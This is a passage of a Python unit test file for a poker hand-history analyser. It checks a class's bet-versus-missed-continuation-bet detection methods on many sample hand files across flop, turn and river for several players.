msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCC__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_b_vs_mcb(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXX__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
def test_b_vs_mcb_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_b_vs_mcb_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
